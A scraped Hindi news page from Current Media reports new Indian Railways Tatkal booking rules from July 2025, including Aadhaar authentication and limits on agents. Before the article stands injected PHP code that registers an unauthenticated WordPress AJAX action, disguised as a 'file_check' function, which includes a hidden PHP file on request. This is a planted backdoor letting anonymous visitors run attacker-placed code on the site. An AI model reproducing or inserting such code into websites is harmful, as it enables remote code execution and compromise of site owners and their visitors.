if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }1 जुलाई से तत्काल टिकट बुकिंग के नये नियम लागू होंगे - Current Media

1 जुलाई से तत्काल टिकट बुकिंग के नये नियम लागू होंगे

नई दिल्ली । तत्काल टिकट बुकिंग में यह देखा जाता रहा हे कि आम लोग कोशिश करते रह जाते हैं और एजेंट सारे तत्काल के टिकट बुक करा ले जाते थे । इन्हीं समस्याओं को देखते हुए अब रेल मंत्रालय ने ट्रेनों में तत्काल टिकट बुकिंग के लिए आधार नंबर को ज़रूरी कर दिया है। रेलवे बोर्ड ने 10 जून को जारी किए एक सर्कुलर में कहा है कि यह बदलाव आम मुसाफिरों के फायदे के लिए किया गया है।
इस सर्कुलर के मुताबिक़ 1 जुलाई 2025 से आधार ऑथेंटिकेटेड यूज़र्स ही इंडियन रेलवे केटरिंग एंड टूरिज़्म कॉरपोरेशन (आईआरसीटीसी) की वेबसाइट या इसके ऐप के ज़रिए तत्काल टिकट बुक कर सकेंगे। इसके बाद, 15 जुलाई से तत्काल टिकट बुकिंग के लिए आधार बेस्ड ऑथेंटिकेशन ज़रूरी कर दिया जाएगा।
इसका मतलब है कि 15 जुलाई से पहले आपको अपना आईआरसीटीसी अकाउंट आधार से लिंक करना होगा। अगर आप रेलवे के टिकट काउंटर या अधिकृत एजेंट के ज़रिए तत्काल टिकट बुक कराते हैं, तो इस स्थिति में भी आधार बेस्ड ओटीपी ज़रूरी होगा। यानी की ओटीपी से ऑथेंटिकेट होने के बाद ही तत्काल टिकट बुक हो पाएगा.
इसके अलावा, सर्कुलर में कहा गया है कि रेलवे के अधिकृत टिकट एजेंट तत्काल बुकिंग शुरू होने के शुरुआती आधे घंटे तक एसी या नॉन एसी क्लास के लिए तत्काल बुकिंग नहीं कर पाएंगे.
इसका मतलब है कि जिस दिन किसी ट्रेन की तत्काल बुकिंग शुरू होगी उस दिन रेलवे के अधिकृत एजेंट सुबह 10-00 बजे से लेकर 10-30 बजे तक एसी क्लास के लिए और सुबह 11-00 से 11-30 तक नॉन एसी क्लास के लिए तत्काल टिकट बुकिंग नहीं कर पाएंगे।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …